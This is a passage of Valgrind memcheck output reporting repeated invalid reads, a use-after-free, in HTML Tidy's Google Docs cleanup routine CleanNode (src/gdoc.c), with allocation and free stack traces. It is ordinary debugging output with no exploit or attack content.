==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e808 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D318: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e808 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D327: CleanNode (src/gdoc.c:115)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e808 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D3BF: CleanNode (src/gdoc.c:131)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e7f8 is 40 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D204: CleanNode (src/gdoc.c:101)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8e7e8 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D213: CleanNode (src/gdoc.c:103)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b91ed8 is 24 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D22A: CleanNode (src/gdoc.c:105)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b92190 is 16 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 4
==1752197== at 0x430E8E: prvTidynodeIsElement (src/tags.c:1053)
==1752197== by 0x41D23A: CleanNode (src/gdoc.c:107)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921d0 is 80 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D253: CleanNode (src/gdoc.c:109)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921b8 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D262: CleanNode (src/gdoc.c:109)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921b8 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D28B: CleanNode (src/gdoc.c:111)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921b8 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D29A: CleanNode (src/gdoc.c:111)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921b8 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D2D7: CleanNode (src/gdoc.c:113)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D3ED: CleanNode (src/gdoc.c:134)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b921b8 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x434644: prvTidyFreeNode (src/lexer.c:1555)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
